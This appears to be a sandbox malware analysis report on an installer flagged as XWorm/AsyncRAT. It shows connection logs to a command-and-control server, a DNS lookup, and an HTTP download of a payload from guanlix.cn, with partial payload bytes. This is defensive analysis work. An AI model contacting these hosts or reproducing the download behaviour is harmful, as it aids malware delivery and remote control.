            Jul 2, 2024 19:30:27.197320938 CEST700049739134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:27.197410107 CEST497397000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:30.715362072 CEST497397000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:30.719428062 CEST497407000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:30.720454931 CEST700049739134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:30.724442959 CEST700049740134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:30.724566936 CEST497407000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:30.792212009 CEST497407000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:30.797368050 CEST700049740134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:32.841278076 CEST700049740134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:32.841388941 CEST497407000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:36.793535948 CEST497407000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:36.796175003 CEST497417000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:36.799988985 CEST700049740134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:36.802227974 CEST700049741134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:36.802330017 CEST497417000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:36.897264004 CEST497417000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:36.902235031 CEST700049741134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:38.873677969 CEST700049741134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:38.873779058 CEST497417000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:41.920496941 CEST497417000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:41.923003912 CEST497427000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:41.927505016 CEST700049741134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:41.928380966 CEST700049742134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:41.928509951 CEST497427000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:41.974278927 CEST497427000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:41.979114056 CEST700049742134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:42.278321028 CEST497427000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:42.285047054 CEST700049742134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:43.295420885 CEST497427000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:43.300215960 CEST700049742134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:43.962316990 CEST700049742134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:43.962382078 CEST497427000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:47.231038094 CEST497427000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:47.233432055 CEST497437000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:47.235815048 CEST700049742134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:47.238224030 CEST700049743134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:47.238507032 CEST497437000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:47.322927952 CEST497437000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:47.327991009 CEST700049743134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:49.297533035 CEST700049743134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:49.297652006 CEST497437000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:52.324985027 CEST497437000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:52.326944113 CEST497447000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:52.335215092 CEST700049743134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:52.335875034 CEST700049744134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:52.335953951 CEST497447000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:52.363049984 CEST497447000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:52.368151903 CEST700049744134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:54.432667971 CEST700049744134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:54.432956934 CEST497447000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:57.372081041 CEST497447000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:57.375379086 CEST497457000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:57.377944946 CEST700049744134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:57.380502939 CEST700049745134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:57.380614996 CEST497457000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:57.449955940 CEST497457000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:57.458451033 CEST700049745134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:57.544472933 CEST497457000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:57.549258947 CEST700049745134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:57.606540918 CEST497457000192.168.2.8134.122.174.169
            Jul 2, 2024 19:30:57.611429930 CEST700049745134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:59.436841011 CEST700049745134.122.174.169192.168.2.8
            Jul 2, 2024 19:30:59.436904907 CEST497457000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:02.762373924 CEST497457000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:02.764079094 CEST497467000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:02.767191887 CEST700049745134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:02.768848896 CEST700049746134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:02.768924952 CEST497467000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:02.802392960 CEST497467000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:03.000890970 CEST700049746134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:03.000953913 CEST497467000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:03.007466078 CEST700049746134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:04.823136091 CEST700049746134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:04.823209047 CEST497467000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:07.951663017 CEST497467000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:07.951776981 CEST497477000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:07.957549095 CEST700049746134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:07.957775116 CEST700049747134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:07.958101034 CEST497477000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:08.063879967 CEST497477000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:08.068898916 CEST700049747134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:10.011204004 CEST700049747134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:10.011396885 CEST497477000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:13.199958086 CEST497477000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:13.202524900 CEST497487000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:13.204940081 CEST700049747134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:13.207576036 CEST700049748134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:13.207731009 CEST497487000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:13.237282038 CEST497487000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:13.242218018 CEST700049748134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:15.429614067 CEST700049748134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:15.429680109 CEST497487000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:18.299367905 CEST497487000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:18.301054955 CEST497497000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:18.306204081 CEST700049748134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:18.307039976 CEST700049749134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:18.307147026 CEST497497000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:18.415491104 CEST497497000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:18.568823099 CEST700049749134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:18.778371096 CEST497497000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:18.783483982 CEST700049749134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:20.354331017 CEST700049749134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:20.354454994 CEST497497000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:24.169086933 CEST497497000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:24.173999071 CEST700049749134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:24.177870035 CEST497507000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:24.182815075 CEST700049750134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:24.182986021 CEST497507000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:24.291310072 CEST497507000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:24.296179056 CEST700049750134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:26.248647928 CEST700049750134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:26.248788118 CEST497507000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:29.356277943 CEST497507000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:29.358205080 CEST497517000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:29.362138987 CEST700049750134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:29.363795996 CEST700049751134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:29.363874912 CEST497517000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:29.391676903 CEST497517000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:29.396912098 CEST700049751134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:31.416445971 CEST700049751134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:31.416575909 CEST497517000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:34.421046019 CEST497527000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:34.421046972 CEST497517000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:34.426074028 CEST700049752134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:34.426194906 CEST700049751134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:34.426250935 CEST497527000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:34.516607046 CEST497527000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:34.521615028 CEST700049752134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:34.559439898 CEST497527000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:34.566580057 CEST700049752134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:34.653336048 CEST497527000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:34.659912109 CEST700049752134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:36.464318991 CEST700049752134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:36.464508057 CEST497527000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:39.717206955 CEST497527000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:39.717344046 CEST497537000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:39.722126007 CEST700049752134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:39.722143888 CEST700049753134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:39.722512007 CEST497537000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:39.783711910 CEST497537000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:39.789237976 CEST700049753134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:41.805804014 CEST700049753134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:41.805944920 CEST497537000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:45.074840069 CEST497537000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:45.077677965 CEST497547000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:45.083702087 CEST700049753134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:45.086682081 CEST700049754134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:45.086767912 CEST497547000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:45.115073919 CEST497547000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:45.418534040 CEST497547000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:46.029532909 CEST497547000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:46.160366058 CEST700049754134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:46.160378933 CEST700049754134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:46.160598993 CEST700049754134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:47.157784939 CEST700049754134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:47.159552097 CEST497547000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:50.636271000 CEST497547000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:50.638814926 CEST497557000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:50.641449928 CEST700049754134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:50.645524025 CEST700049755134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:50.645625114 CEST497557000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:50.735129118 CEST497557000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:50.739895105 CEST700049755134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:52.699563980 CEST700049755134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:52.699651003 CEST497557000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:55.887594938 CEST497557000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:55.889283895 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:55.894865036 CEST700049755134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:55.897037029 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:55.897145987 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:55.934952021 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:55.939755917 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:56.106848001 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:56.112548113 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:56.215698957 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:56.225126028 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:56.278193951 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:56.285275936 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:56.293874979 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:31:56.300966978 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:57.950386047 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:31:57.950444937 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:01.372077942 CEST497567000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:01.376926899 CEST700049756134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:01.398260117 CEST497577000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:01.405540943 CEST700049757134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:01.407675982 CEST497577000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:01.590965033 CEST497577000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:01.596873045 CEST700049757134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:01.606439114 CEST497577000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:01.611619949 CEST700049757134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:01.747338057 CEST497577000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:01.752254009 CEST700049757134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:03.475419998 CEST700049757134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:03.475570917 CEST497577000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:06.840646982 CEST497577000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:06.842832088 CEST497587000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:06.845565081 CEST700049757134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:06.847601891 CEST700049758134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:06.847763062 CEST497587000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:06.903548002 CEST497587000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:06.908401012 CEST700049758134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:08.905579090 CEST700049758134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:08.905706882 CEST497587000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:11.918708086 CEST497587000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:11.920579910 CEST497597000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:11.923651934 CEST700049758134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:11.925474882 CEST700049759134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:11.925570011 CEST497597000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:11.954216957 CEST497597000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:11.959784985 CEST700049759134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:13.983453989 CEST700049759134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:13.983519077 CEST497597000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:17.496843100 CEST497597000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:17.500328064 CEST497607000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:17.502249002 CEST700049759134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:17.510435104 CEST700049760134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:17.510668993 CEST497607000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:17.584835052 CEST497607000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:17.589854956 CEST700049760134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:17.606523991 CEST497607000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:17.614480972 CEST700049760134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:17.653307915 CEST497607000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:17.661465883 CEST700049760134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:19.577548981 CEST700049760134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:19.577711105 CEST497607000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:22.763567924 CEST497607000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:22.764404058 CEST497617000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:22.768897057 CEST700049760134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:22.769207954 CEST700049761134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:22.769339085 CEST497617000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:22.875261068 CEST497617000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:22.880747080 CEST700049761134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:24.309571981 CEST497617000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:24.314403057 CEST700049761134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:24.831147909 CEST700049761134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:24.831609964 CEST497617000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:28.247117996 CEST497617000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:28.250333071 CEST497627000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:28.252075911 CEST700049761134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:28.255599022 CEST700049762134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:28.255682945 CEST497627000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:28.284893036 CEST497627000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:28.289771080 CEST700049762134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:30.309493065 CEST700049762134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:30.309556961 CEST497627000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:33.794002056 CEST497627000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:33.795913935 CEST497637000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:33.802814960 CEST700049762134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:33.804368019 CEST700049763134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:33.804440022 CEST497637000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:33.845343113 CEST497637000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:33.853243113 CEST700049763134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:33.903445005 CEST497637000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:33.911473036 CEST700049763134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:34.512639999 CEST497637000192.168.2.8134.122.174.169
            Jul 2, 2024 19:32:34.517575026 CEST700049763134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:35.839896917 CEST700049763134.122.174.169192.168.2.8
            Jul 2, 2024 19:32:35.839998007 CEST497637000192.168.2.8134.122.174.169
            TimestampSource PortDest PortSource IPDest IP
            Jul 2, 2024 19:28:28.492990017 CEST5908153192.168.2.81.1.1.1
            Jul 2, 2024 19:28:28.892086983 CEST53590811.1.1.1192.168.2.8
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 2, 2024 19:28:28.492990017 CEST192.168.2.81.1.1.10xe0Standard query (0)guanlix.cnA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 2, 2024 19:28:28.892086983 CEST1.1.1.1192.168.2.80xe0No error (0)guanlix.cn91.208.240.157A (IP address)IN (0x0001)false
            • guanlix.cn:881
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.84970491.208.240.1578811564C:\Users\user\Desktop\998_popxinv_Installer.exe
            TimestampBytes transferredDirectionData
            Jul 2, 2024 19:28:28.903692007 CEST94OUTGET /998.ccp HTTP/1.1
            User-Agent: Download
            Host: guanlix.cn:881
            Cache-Control: no-cache
            Jul 2, 2024 19:28:29.858350039 CEST1236INHTTP/1.1 200 OK
            Server: nginx/1.26.1
            Date: Tue, 02 Jul 2024 17:28:12 GMT
            Content-Type: application/octet-stream
            Content-Length: 71938
            Last-Modified: Mon, 01 Jul 2024 15:58:27 GMT
            Connection: keep-alive
            ETag: "6682d223-11902"
            Accept-Ranges: bytes
            Data Raw: e8 88 bb 00 00 88 bb 00 00 47 37 45 de e2 93 60 43 cd f2 b7 77 6f 01 1b 00 75 08 f2 3a 89 f9 f3 f0 7b f0 f4 2c d4 cc d8 24 00 00 00 00 22 bd 18 fe a3 43 ac 17 ee b6 3e 62 b0 ff 80 df 8e 31 4a e4 ca a9 b0 12 6a db 7e 32 35 ed 70 f8 00 db 16 83 58 12 b7 42 68 b7 52 5a 42 30 0a 12 47 61 75 e8 4e 53 68 ae d8 84 ed 34 72 0e 7f ad f8 0d 5b 01 fc 84 6c 7d 68 c8 71 4b 48 16 2e 08 c4 02 20 61 81 75 b6 04 8b 61 02 cd 54 2f 4c 32 62 1f cf dc 51 a3 87 a4 fe 53 f4 59 37 e4 9d d8 c7 5c 76 05 e8 ad 49 1f 28 73 dd ed 6e 2e 0c 48 2f 93 6c da 4c 61 bc 8c 34 74 f0 4f 0c a4 e8 50 23 6d d1 73 fc fc d2 56 58 1a 12 1a 69 5a e9 fe 1d cc 66 23 37 fc 39 01 1f 0d 71 e0 c9 31 40 76 3d 4d 14 a3 06 aa fa ab 14 ac 03 80 13 f5 7c 05 81 fa 10 80 bb 6b 89 73 e8 31 b9 5b b5 2e 0e 35 ac b7 56 10 05 15 cc 06 bf 29 ab 89 35 b0 05 25 0d c1 f4 65 5c ab e0 7c 07 b0 24 8c 12 5e ef 50 b2 92 07 f6 1f 74 7c 28 9a ba 29 e1 17 a5 cb 4b a2 57 6c 0f 3c d0 9e 42 2a 27 6e 46 6e f1 42 a1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
            Data Ascii: G7E`Cwou:{,$"C>b1Jj~25pXBhRZB0GauNSh4r[l}hqKH. auaT/L2bQSY7\vI(sn.H/lLa4tOP#msVXiZf#79q1@v=M|ks1[.5V)5%e\|$^Pt|()KWl<B*'nFnB|qg9XVJ6C}FWz~9=,.4-g'<udTF0 T?F/:+vl$tN?3~=0Hm_--}Of}r|,0DP]~U'99=ap9L.Q>/1:&&Xj;BtLtBV?Q=^ll7%~YWw5VJN71=`Aa]%M=9}!{Y1kr-cmaoa#lw`B[@UYH:^[K5km


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Target ID:0
            Start time:13:28:27
            Start date:02/07/2024
            Path:C:\Users\user\Desktop\998_popxinv_Installer.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\998_popxinv_Installer.exe"
            Imagebase:0xa10000
            File size:249'344 bytes
            MD5 hash:A8DC1E962F313CD278B0E648A6674D91
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
            Reputation:low
            Has exited:false

            Reset < >

              Execution Graph

              Execution Coverage:9%
              Dynamic/Decrypted Code Coverage:2.9%
              Signature Coverage:3.2%
              Total number of Nodes:2000
              Total number of Limit Nodes:62
              execution_graph 21094 5fa7308 21095 5fa732d 21094->21095 21098 5fa7597 21095->21098 21096 5fa738f 21102 5fa75e0 21098->21102 21110 5fa75d0 21098->21110 21099 5fa75b6 21099->21096 21103 5fa75ed 21102->21103 21104 5fa7615 21102->21104 21103->21099 21118 5fa6f64 21104->21118 21106 5fa7636 21106->21099 21108 5fa76fe GlobalMemoryStatusEx 21109 5fa772e 21108->21109 21109->21099 21111 5fa75e0 21110->21111 21112 5fa75ed 21111->21112 21113 5fa6f64 GlobalMemoryStatusEx 21111->21113 21112->21099 21115 5fa7632 21113->21115 21114 5fa7636 21114->21099 21115->21114 21116 5fa76fe GlobalMemoryStatusEx 21115->21116 21117 5fa772e 21116->21117 21117->21099 21119 5fa76b8 GlobalMemoryStatusEx 21118->21119 21121 5fa7632 21119->21121 21121->21106 21121->21108 21122 a159d4 21172 a1a9b0 21122->21172 21124 a159e0 GetStartupInfoW 21125 a159f4 HeapSetInformation 21124->21125 21127 a159ff 21124->21127 21125->21127 21173 a1ac41 HeapCreate 21127->21173 21128 a15a4d 21129 a15a58 21128->21129 21241 a159ab 21128->21241 21249 a198e5 GetModuleHandleW 21129->21249 21132 a15a5e 21133 a15a62 21132->21133 21134 a15a6a __RTC_Initialize 21132->21134 21135 a159ab _fast_error_exit 66 API calls 21133->21135 21174 a1ae9e GetStartupInfoW 21134->21174 21136 a15a69 21135->21136 21136->21134 21139 a15a83 GetCommandLineA 21187 a1ce83 GetEnvironmentStringsW 21139->21187 21140 a15a7b 21141 a1b61f __amsg_exit 66 API calls 21140->21141 21144 a15a82 21141->21144 21144->21139 21146 a15a9d 21147 a15aa1 21146->21147 21148 a15aa9 21146->21148 21149 a1b61f __amsg_exit 66 API calls 21147->21149 21200 a1cb52 21148->21200 21151 a15aa8 21149->21151 21151->21148 21152 a15aae 21153 a15ab2 21152->21153 21154 a15aba 21152->21154 21155 a1b61f __amsg_exit 66 API calls 21153->21155 21220 a1b3fe 21154->21220 21157 a15ab9 21155->21157 21157->21154 21158 a15ac1 21159 a15ac6 21158->21159 21160 a15acd 21158->21160 21161 a1b61f __amsg_exit 66 API calls 21159->21161 21226 a1caf3 21160->21226 21163 a15acc 21161->21163 21163->21160 21164 a15ad2 21165 a15ad8 21164->21165 21232 a12f3a 21164->21232 21165->21164 21168 a15afc 21288 a1b601 21168->21288 21171 a15b01 __wsopen_helper 21172->21124 21173->21128 21175 a163fd __calloc_crt 66 API calls 21174->21175 21176 a1aebc 21175->21176 21176->21176 21178 a163fd __calloc_crt 66 API calls 21176->21178 21181 a15a77 21176->21181 21182 a1b031 21176->21182 21183 a1afb1 21176->21183 21177 a1b067 GetStdHandle 21177->21182 21178->21176 21179 a1b0cb SetHandleCount 21179->21181 21180 a1b079 GetFileType 21180->21182 21181->21139 21181->21140 21182->21177 21182->21179 21182->21180 21186 a1b09f InitializeCriticalSectionAndSpinCount 21182->21186 21183->21182 21184 a1afe8 InitializeCriticalSectionAndSpinCount 21183->21184 21185 a1afdd GetFileType 21183->21185 21184->21181 21184->21183 21185->21183 21185->21184 21186->21181 21186->21182 21189 a1ce9f 21187->21189 21192 a15a93 21187->21192 21188 a1ceb4 WideCharToMultiByte 21190 a1ced4 21188->21190 21191 a1cf0c 